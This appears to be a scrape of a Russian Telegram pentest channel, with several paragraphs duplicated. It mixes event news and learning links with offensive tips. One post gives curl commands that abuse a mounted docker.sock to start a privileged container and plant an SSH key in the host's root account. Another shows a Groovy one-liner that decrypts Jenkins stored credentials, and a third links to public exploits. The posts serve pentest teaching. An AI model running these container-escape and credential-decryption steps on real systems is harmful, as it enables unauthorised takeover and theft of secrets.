Forwarded from Just Security
Как за несколько секунд просканировать внешний периметр на наличие открытых портов и уязвимостей?
Недавно коллега рассказал о новом инструменте Nrich, который позволяет очень быстро проанализировать список IP-адресов на наличие общеизвестных уязвимостей (баннерный поиск) и открытых сервисов.
Конечно же инструмент представляет из себя пассивный сканер, который использует API Shodan.
Nrich проверил пулл адресов из маски /24 за 5 секунд:
Недавно коллега рассказал о новом инструменте Nrich, который позволяет очень быстро проанализировать список IP-адресов на наличие общеизвестных уязвимостей (баннерный поиск) и открытых сервисов.
Конечно же инструмент представляет из себя пассивный сканер, который использует API Shodan.
Nrich проверил пулл адресов из маски /24 за 5 секунд:
➜ ~ wc -l scope.txt
255 scope.txt
time nrich scope.txt > /dev/null
nrich scope.txt > /dev/null 0.07s user 0.04s system 2% cpu 4.913 total
🔥11👍3
Forwarded from Codeby
Чрезвычайно срочная инфа от НКЦКИ.
1) В течении 24ч все потребители оборудования cisco на территории России будут отключены от смарт аккаунтов.
2) в течении суток будет инициировано проверка лицензирования со стороны серверов cisco.
Рекомендуют: на выходе инфраструктуры в сеть интернет поставить жёсткий access-list с запретом трафика на адрес tools.cisco.com
Если это сделать, то будет отложенный период от 30 до 90 дней, когда функционал оборудования сохранится
1) В течении 24ч все потребители оборудования cisco на территории России будут отключены от смарт аккаунтов.
2) в течении суток будет инициировано проверка лицензирования со стороны серверов cisco.
Рекомендуют: на выходе инфраструктуры в сеть интернет поставить жёсткий access-list с запретом трафика на адрес tools.cisco.com
Если это сделать, то будет отложенный период от 30 до 90 дней, когда функционал оборудования сохранится
🔥7👍2
Forwarded from Positive Events
🚨 Долгожданные новости о майской кибербитве
Для синих и красных команд The Standoff начнётся 16 мая, а закончится 19 мая — 4 дня с перерывами на сон (как вы просили 😉). Три команды пригласим в ЦМТ, остальные — онлайн.
Защитникам будут противостоять 15 команд хакеров. Топ-5 по итогам ноябрьской кибербитвы мы пригласим напрямую, минуя отборочный тур. Напомним этих героев:
🔺 Codeby&NitroTeam
🔺 True0xA3
🔺 SPbCTF
🔺 Invuls
🔺 Bulba Hackers
📊 Оставшиеся 10 слотов могут занять команды из любой точки мира. Отбирать команды мы будем по «резюме». Если у вас есть опыт в Offensive Security и пентесте, точно подавайте заявку. Можно писать на русском или английском, как вам комфортнее.
👉 Для русскоговорящих команд форма регистрации — forms.gle/zPvrpadk9VfRWYBHA
👉 Red teams registration for participating in The Standoff — forms.gle/Vg1BH1Duj3hrDVaZ8
Регистрация открыта до 3 апреля. Жюри рассмотрит все заявки, мы свяжемся с капитанами до 15 апреля и опубликуем список приглашённых команд. Удачи! 💪
Для синих и красных команд The Standoff начнётся 16 мая, а закончится 19 мая — 4 дня с перерывами на сон (как вы просили 😉). Три команды пригласим в ЦМТ, остальные — онлайн.
Защитникам будут противостоять 15 команд хакеров. Топ-5 по итогам ноябрьской кибербитвы мы пригласим напрямую, минуя отборочный тур. Напомним этих героев:
🔺 Codeby&NitroTeam
🔺 True0xA3
🔺 SPbCTF
🔺 Invuls
🔺 Bulba Hackers
📊 Оставшиеся 10 слотов могут занять команды из любой точки мира. Отбирать команды мы будем по «резюме». Если у вас есть опыт в Offensive Security и пентесте, точно подавайте заявку. Можно писать на русском или английском, как вам комфортнее.
👉 Для русскоговорящих команд форма регистрации — forms.gle/zPvrpadk9VfRWYBHA
👉 Red teams registration for participating in The Standoff — forms.gle/Vg1BH1Duj3hrDVaZ8
Регистрация открыта до 3 апреля. Жюри рассмотрит все заявки, мы свяжемся с капитанами до 15 апреля и опубликуем список приглашённых команд. Удачи! 💪
👍4
Forwarded from frozen@rivens.life (Deep Learning bot)
Контейнеры и виртуализация.
Виртуализация:
Как именно работает виртуализация:
https://www.ibm.com/ru-ru/cloud/learn/virtual-machines
Видео из ссылки выше о том, как работают гипервизоры и какого типа бывают:
https://www.youtube.com/watch?v=FZR0rG3HKIk
Архитектурное сравнение контейнеров и виртуальных машин:
https://docs.microsoft.com/ru-ru/virtualization/windowscontainers/about/containers-vs-vm
Контейнеры:
Что за ядро используется внутри Docker images:
https://stackoverflow.com/questions/32841982/how-can-docker-run-distros-with-different-kernels
Принципы работы докера:
https://stackoverflow.com/questions/16047306/how-is-docker-different-from-a-virtual-machine
Использование Union Mount / AUFS в докере:
https://jessicagreben.medium.com/digging-into-docker-layers-c22f948ed612
Официальная документация к AUFS / OverlayFS:
https://docs.docker.com/storage/storagedriver/aufs-driver/
https://docs.docker.com/storage/storagedriver/overlayfs-driver/
Виртуализация:
Как именно работает виртуализация:
https://www.ibm.com/ru-ru/cloud/learn/virtual-machines
Видео из ссылки выше о том, как работают гипервизоры и какого типа бывают:
https://www.youtube.com/watch?v=FZR0rG3HKIk
Архитектурное сравнение контейнеров и виртуальных машин:
https://docs.microsoft.com/ru-ru/virtualization/windowscontainers/about/containers-vs-vm
Контейнеры:
Что за ядро используется внутри Docker images:
https://stackoverflow.com/questions/32841982/how-can-docker-run-distros-with-different-kernels
Принципы работы докера:
https://stackoverflow.com/questions/16047306/how-is-docker-different-from-a-virtual-machine
Использование Union Mount / AUFS в докере:
https://jessicagreben.medium.com/digging-into-docker-layers-c22f948ed612
Официальная документация к AUFS / OverlayFS:
https://docs.docker.com/storage/storagedriver/aufs-driver/
https://docs.docker.com/storage/storagedriver/overlayfs-driver/
👍8🔥1👏1
Свеженький LPE в Linux: CVE-2022-0995 через heap out-of-bounds write.
Ссылка на эксплоит: https://github.com/Bonfee/CVE-2022-0995
Ссылка на эксплоит: https://github.com/Bonfee/CVE-2022-0995
GitHub
GitHub - Bonfee/CVE-2022-0995: CVE-2022-0995 exploit
CVE-2022-0995 exploit. Contribute to Bonfee/CVE-2022-0995 development by creating an account on GitHub.
👍1
Как говорится… “Только без паники!”
https://github.com/BobTheShoplifter/Spring4Shell-POC
Возможно! Возможно… Есть новая страшная бага в Spring. Но судя по комментам, как будто опасность пытаются завышать. Будем следить за деталями.
https://github.com/BobTheShoplifter/Spring4Shell-POC
Возможно! Возможно… Есть новая страшная бага в Spring. Но судя по комментам, как будто опасность пытаются завышать. Будем следить за деталями.
GitHub
GitHub - BobTheShoplifter/Spring4Shell-POC: Spring4Shell Proof Of Concept/And vulnerable application CVE-2022-22965
Spring4Shell Proof Of Concept/And vulnerable application CVE-2022-22965 - BobTheShoplifter/Spring4Shell-POC
Вот и пруфы. Вроде не выглядит суперпопулярным кейсом, но могу ошибаться.
👍3
Forwarded from frozen@rivens.life (⍰)
В продолжение темы:
https://github.com/rive-n/SpringShell/tree/master
Приложение было уже готово ночью, но эксплойт не работал, так как суть заключалась в том, что было необходимо использовать Tomcat:
"Exploitation requires an endpoint with DataBinder enabled (e.g. a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application. For example, when Spring is deployed to Apache Tomcat, the WebAppClassLoader is accessible, which allows an attacker to call getters and setters to ultimately write a malicious JSP file to disk. However, if Spring is deployed using the Embedded Tomcat Servlet Container the classloader is a LaunchedURLClassLoader which has limited access."
Цитата отсюда: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?m=1
https://github.com/rive-n/SpringShell/tree/master
Приложение было уже готово ночью, но эксплойт не работал, так как суть заключалась в том, что было необходимо использовать Tomcat:
"Exploitation requires an endpoint with DataBinder enabled (e.g. a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application. For example, when Spring is deployed to Apache Tomcat, the WebAppClassLoader is accessible, which allows an attacker to call getters and setters to ultimately write a malicious JSP file to disk. However, if Spring is deployed using the Embedded Tomcat Servlet Container the classloader is a LaunchedURLClassLoader which has limited access."
Цитата отсюда: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?m=1
GitHub
GitHub - rive-n/SpringShell
Contribute to rive-n/SpringShell development by creating an account on GitHub.
👍1
Немного интересностей из моей жизни.
Кто-то в курсе того, чем я занимаюсь, кто-то нет. Многим может быть полезно узнать, а мне может быть полезно это рассказать.
Помимо хакинга я заинтересован образованием в своей любимой сфере, в сфере кибербезопасности. Я давно принимаю участие в подобных активностях. Так вот, немного новостей об этом…
```
Школа HackerU вышла из состава российской Ed- и HR-Tech группы компаний Humantek, входящей в международную технологическую группу Prytek.
Новое название компании — Образовательный центр по кибербезопасности CyberEd (cyber-ed.ru).
Новым управляющим партнёром Образовательного центра по кибербезопасности CyberEd стал Егор Богомолов — предприниматель отрасли информационной безопасности, эксперт по кибербезопасности с опытом работы в крупнейших ИБ компаниях РФ, этичный хакер.
```
Link: https://vc.ru/u/446473-cybered/391787-shkola-it-i-kiberbezopasnosti-hackeru-stanovitsya-obrazovatelnym-centrom-po-kiberbezopasnosti-cybered
Если ищите, где получить знания и умения для сферы кибербезопасности, то не найдете в России другой компании, где было бы объединено столько экспертов высокого уровня, делящихся знаниями в режиме открытого общения и поддержки учащихся.
Я рад и горжусь тем, что, так долго участвуя в работе компании в разных формах партнерства, приложил руку к развитию тысяч специалистов за последние несколько лет и теперь могу с еще большими возможностями влиять на эту сферу. Также, я понимаю на каком уровне сейчас находятся образовательные продукты в сфере компьютерной безопасности в России и вижу сколько нам еще предстоит попытаться сделать.
Надеюсь на светлое будущее этой отрасли и с каждым годом, увеличивая возможность влияния на ее успех, радуюсь тому как она процветает. Надеюсь и вас касается или коснется развитие этой сферы! (В хорошем смысле ;D )
Кто-то в курсе того, чем я занимаюсь, кто-то нет. Многим может быть полезно узнать, а мне может быть полезно это рассказать.
Помимо хакинга я заинтересован образованием в своей любимой сфере, в сфере кибербезопасности. Я давно принимаю участие в подобных активностях. Так вот, немного новостей об этом…
```
Школа HackerU вышла из состава российской Ed- и HR-Tech группы компаний Humantek, входящей в международную технологическую группу Prytek.
Новое название компании — Образовательный центр по кибербезопасности CyberEd (cyber-ed.ru).
Новым управляющим партнёром Образовательного центра по кибербезопасности CyberEd стал Егор Богомолов — предприниматель отрасли информационной безопасности, эксперт по кибербезопасности с опытом работы в крупнейших ИБ компаниях РФ, этичный хакер.
```
Link: https://vc.ru/u/446473-cybered/391787-shkola-it-i-kiberbezopasnosti-hackeru-stanovitsya-obrazovatelnym-centrom-po-kiberbezopasnosti-cybered
Если ищите, где получить знания и умения для сферы кибербезопасности, то не найдете в России другой компании, где было бы объединено столько экспертов высокого уровня, делящихся знаниями в режиме открытого общения и поддержки учащихся.
Я рад и горжусь тем, что, так долго участвуя в работе компании в разных формах партнерства, приложил руку к развитию тысяч специалистов за последние несколько лет и теперь могу с еще большими возможностями влиять на эту сферу. Также, я понимаю на каком уровне сейчас находятся образовательные продукты в сфере компьютерной безопасности в России и вижу сколько нам еще предстоит попытаться сделать.
Надеюсь на светлое будущее этой отрасли и с каждым годом, увеличивая возможность влияния на ее успех, радуюсь тому как она процветает. Надеюсь и вас касается или коснется развитие этой сферы! (В хорошем смысле ;D )
vc.ru
Школа IT и кибербезопасности HackerU становится Образовательным центром по кибербезопасности CyberEd — CyberEd на vc.ru
Школа HackerU вышла из состава российской Ed- и HR-Tech группы компаний Humantek, входящей в международную технологическую группу Prytek.
🔥28👍10🤯5
Media is too big
VIEW IN TELEGRAM
#реклама
Каков сейчас рынок услуг ИБ? Просто посмотрите на это.
Длинные цепочки субподрядчиков, грабительские комиссии, непрозрачное ценообразование и сомнительные гарантии качества. Альтернатива?
Третья Сторона - первый маркетплейс услуг ИБ в России!
Работай напрямую с проверенными исполнителями, без посредников, с максимальной прозрачностью.
Ссылка на сайт
Каков сейчас рынок услуг ИБ? Просто посмотрите на это.
Длинные цепочки субподрядчиков, грабительские комиссии, непрозрачное ценообразование и сомнительные гарантии качества. Альтернатива?
Третья Сторона - первый маркетплейс услуг ИБ в России!
Работай напрямую с проверенными исполнителями, без посредников, с максимальной прозрачностью.
Ссылка на сайт
🔥9👍4🤯3
Forwarded from RedTeam brazzers
Наш уважаемый подписчик @C0ldheim на днях выступил на встрече DC7342 с докладом "PWN & Defense Dynamic Routing Protocols". Тема раскрыта очень хорошо и очень глубоко. ИМХО: данный доклад обязателен к просмотру всем, для кого слова "внутренний пентест" не пустой звук. https://www.youtube.com/watch?v=tzjFcIk-zfE
Также у автора есть репозитории с инструментами для атак на OSPF и EIGRP:
https://github.com/C0ldheim/EIGRPWN
http://github.com/C0ldheim/OSPFMD5Crack (особенно полезно)
Также у автора есть репозитории с инструментами для атак на OSPF и EIGRP:
https://github.com/C0ldheim/EIGRPWN
http://github.com/C0ldheim/OSPFMD5Crack (особенно полезно)
YouTube
PWN & Defense Dynamic Routing Protocols by C0ldheim
#запись доклада (https://news.1rj.ru/str/dc7342_hspace/382) про атаки на динамическую маршрутизацию от @necreas1ng.
В записи присутствует теория динамической маршрутизации, а также практика эксплуатации внутри лаборатории на EVE-NG.
Также зацените его репозитории…
В записи присутствует теория динамической маршрутизации, а также практика эксплуатации внутри лаборатории на EVE-NG.
Также зацените его репозитории…
👍1
Forwarded from Нарыл
Если вы оказались в docker контейнере, в который проброшен Docker API socket, то это может позволить выбраться из контейнера на хостовую машину. Для этого, например, можно запустить привилегированный контейнер, подмонтировать в него хостовую ФС и дальше, например, вписать свой ключ в /root/.ssh/authorized_keys:
Это все понятно, но вот сегодня я в очередной раз оказался в контейнере с прокинутым
Значит придется взаимодействовать с докеровским unix socket на прямую. Docker API Socket принимает запросы по протоколу HTTP (docs). А значит можно использовать
Составил для себя список альтернативных docker команд:
docker image:
docker ps:
docker pull:
Создать привилегированный контейнер, в котором будет выполнена команда - (docker create):
docker start:
docker logs:
docker rm:
Тут важно что нельзя одним запросом создать и запустить контейнер, как делает
Также, если curl тоже нету, то можно обращаться с unix socket через python, примерно так:
docker run --privileged -v /:/mnt ubuntu echo key >> /mnt/root/.ssh/authorized_keys
Это все понятно, но вот сегодня я в очередной раз оказался в контейнере с прокинутым
docker.sock, но без docker CLI. Ситуация вполне возможна если вы пробрались в условный Gitlab используете docker shared runner и не знаете в каком из доступных образов есть docker cli, при этом прямого доступа в интернет нет.Значит придется взаимодействовать с докеровским unix socket на прямую. Docker API Socket принимает запросы по протоколу HTTP (docs). А значит можно использовать
curl ... --unix-socket /var/run/docker.sock. Составил для себя список альтернативных docker команд:
docker image:
curl --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[].RepoTags'
docker ps:
curl --unix-socket /var/run/docker.sock http://localhost/containers/json | jq '.[] | "\(.Id) \(.Image)"'
docker pull:
curl --unix-socket /var/run/docker.sock -X POST 'http://localhost/images/create?fromImage=busybox&tag=latest'
Создать привилегированный контейнер, в котором будет выполнена команда - (docker create):
curl --unix-socket /var/run/docker.sock -X POST 'http://localhost/containers/create' --data '{"Cmd":["/bin/bash","-c","echo key > /mnt/root/.ssh/authorized_keys"],"Image":"ubuntu","HostConfig":{"Binds":["/:/mnt/"],"RestartPolicy":{"Privileged":true}},"Tty":true}' -H "Content-Type: application/json"
docker start:
curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/<id>/start
docker logs:
curl --unix-socket /var/run/docker.sock 'http://localhost/containers/<id>/logs?stderr=1&stdout=1&tail=all' --output -
docker rm:
curl --unix-socket /var/run/docker.sock -X DELETE http://localhost/containers/<id>
Тут важно что нельзя одним запросом создать и запустить контейнер, как делает
docker run. Под капотом он выполняет два HTTP запроса. Первый запрос возвращает айдишник, который нужно использовать в последующем.Также, если curl тоже нету, то можно обращаться с unix socket через python, примерно так:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect('/var/run/docker.sock')
sock.send('''GET /containers/json HTTP/1.1
Host: /var/run/docker.sock
''')
sock.recv(1024)
Docker
Docker Engine API v1.41 reference
Reference documentation and Swagger (OpenAPI) specification for the Docker Engine API.
👍9🔥5
Forwarded from OFFZONE
⚓️ Соскучились? Ждем вас на OFFZONE Meetup!
Привет! Мы давненько ничего не проводили очно.
Поэтому решили не дожидаться августовской встречи на OFFZONE и устроить митап в этом месяце.
Если вы тоже скучали по живому общению в тусовке безопасников, приходите на OFFZONE Meetup.
Мы подготовили 5 докладов: часть из них о технической начинке OFFZONE, а другая — ресерчи.
Митап бесплатный, нужна только регистрация.
🔴 Мы откроем запись и поделимся программой в следующий понедельник, 11 апреля в 16:00. Мест всего 60, так что stay tuned!
Дата и время: 22 апреля, 18:00–21:30
Место: офис BI.ZONE
Адрес: Москва, ул. Ольховская, д. 4, корп. 1, этаж 1.
Привет! Мы давненько ничего не проводили очно.
Поэтому решили не дожидаться августовской встречи на OFFZONE и устроить митап в этом месяце.
Если вы тоже скучали по живому общению в тусовке безопасников, приходите на OFFZONE Meetup.
Мы подготовили 5 докладов: часть из них о технической начинке OFFZONE, а другая — ресерчи.
Митап бесплатный, нужна только регистрация.
🔴 Мы откроем запись и поделимся программой в следующий понедельник, 11 апреля в 16:00. Мест всего 60, так что stay tuned!
Дата и время: 22 апреля, 18:00–21:30
Место: офис BI.ZONE
Адрес: Москва, ул. Ольховская, д. 4, корп. 1, этаж 1.
🔥4👏1
Forwarded from Нарыл
О секретах Jenkins
Jenkins - CI/CD решение. А значит ему нужно где-то хранить креды для доступа к серверам, docker registry, nexus и так далее. В Jenkins есть встроенное хранилище Credentials. Фактически секреты сохраняются на файловой системе в файле
Доступ к ФС может быть получен, например, если администраторы не уменьшили количество executor на master до значения 0, но для этого нужен доступ уровня разработчика в интерфейс Jenkins. Также на моей практике был и обратный случай, когда я попал на windows-сервер с правами пользователя и мог читать файлы Jenkins, один из паролей в сохраненных кредах подошел к интерфейсу Jenkins.
Для расшифрования секретов можно использовать скрипт.
Также, при доступе в интерфейс можно использовать groovy скрипт:
где в кавычках идет зашифрованная строка из credentials.xml. Скрипт этот можно выполнить в https://jenkins/noscript либо в build job'е с типом pipeline.
Статья с разбором устройства шифрования
Jenkins - CI/CD решение. А значит ему нужно где-то хранить креды для доступа к серверам, docker registry, nexus и так далее. В Jenkins есть встроенное хранилище Credentials. Фактически секреты сохраняются на файловой системе в файле
.jenkins/credentials.xml (тут и далее .jekins - домашний каталог jenkins, может отличаться в зависимости от установки). Сами секреты зашифрованы. Но зашифрованы они ключами из двух файлов, которые тоже храняться на файловой системе: .jenkins/secrets/master.key и .jenkins/secrets/hudon.util.Secret. Таким образом доступ к этим файлам позволяет получить доступ ко всем сохраненным credentials всех пользователей.Доступ к ФС может быть получен, например, если администраторы не уменьшили количество executor на master до значения 0, но для этого нужен доступ уровня разработчика в интерфейс Jenkins. Также на моей практике был и обратный случай, когда я попал на windows-сервер с правами пользователя и мог читать файлы Jenkins, один из паролей в сохраненных кредах подошел к интерфейсу Jenkins.
Для расшифрования секретов можно использовать скрипт.
Также, при доступе в интерфейс можно использовать groovy скрипт:
println( hudson.util.Secret.decrypt("{AQAAABAAAAAQ}") )
где в кавычках идет зашифрованная строка из credentials.xml. Скрипт этот можно выполнить в https://jenkins/noscript либо в build job'е с типом pipeline.
Статья с разбором устройства шифрования
GitHub
GitHub - gquere/pwn_jenkins: Notes about attacking Jenkins servers
Notes about attacking Jenkins servers. Contribute to gquere/pwn_jenkins development by creating an account on GitHub.
🔥10👍6
Forwarded from InfoSec
Тройка инструментов findomain, unimap, fhc для супер понятного и быстрого сбора открытых веб портов:
1)
2)
3)
4) PROFIT!
findomain -qt hackerone.com | unimap --fast-scan --stdin --url-output | fhc1)
findomain - ищем поддомены2)
unimap - быстренько сканим порты3)
fhc - чекаем на доступный вебчик4) PROFIT!
🔥10👍4
Подкасты
Многим это откликнулось, а я искренне хочу со своими друзьями и коллегами по цеху продолжить писать подкасты для вас. И я знаю хорошу тему для еще одного выпуска:
“N вопросов пентестеру”
N, потому что не знаю сколько их выйдет заранее;)
Предлагаю вам в этом поучаствовать и к тому же, я обещал разыграть донаты, которые вы накидали мне в прошлый раз.
Поэтому:
В комментариях к этому посту оставляйте вопросы, какие бы вы задали пентестеру (даже если вы сам пентестер;) ).
Лучший вопрос мы вознаградим в 100€ (EUR), а выберем его мы в конце самого подкаста.
Многим это откликнулось, а я искренне хочу со своими друзьями и коллегами по цеху продолжить писать подкасты для вас. И я знаю хорошу тему для еще одного выпуска:
“N вопросов пентестеру”
N, потому что не знаю сколько их выйдет заранее;)
Предлагаю вам в этом поучаствовать и к тому же, я обещал разыграть донаты, которые вы накидали мне в прошлый раз.
Поэтому:
В комментариях к этому посту оставляйте вопросы, какие бы вы задали пентестеру (даже если вы сам пентестер;) ).
Лучший вопрос мы вознаградим в 100€ (EUR), а выберем его мы в конце самого подкаста.
👍14🔥5
YAH
Подкасты Многим это откликнулось, а я искренне хочу со своими друзьями и коллегами по цеху продолжить писать подкасты для вас. И я знаю хорошу тему для еще одного выпуска: “N вопросов пентестеру” N, потому что не знаю сколько их выйдет заранее;) Предлагаю…
Завтра завершаем рубрику для сбора вопросов, формулируем список и уже в ближайшее время позадаем их опытным специалистам под запись! ;)
👍4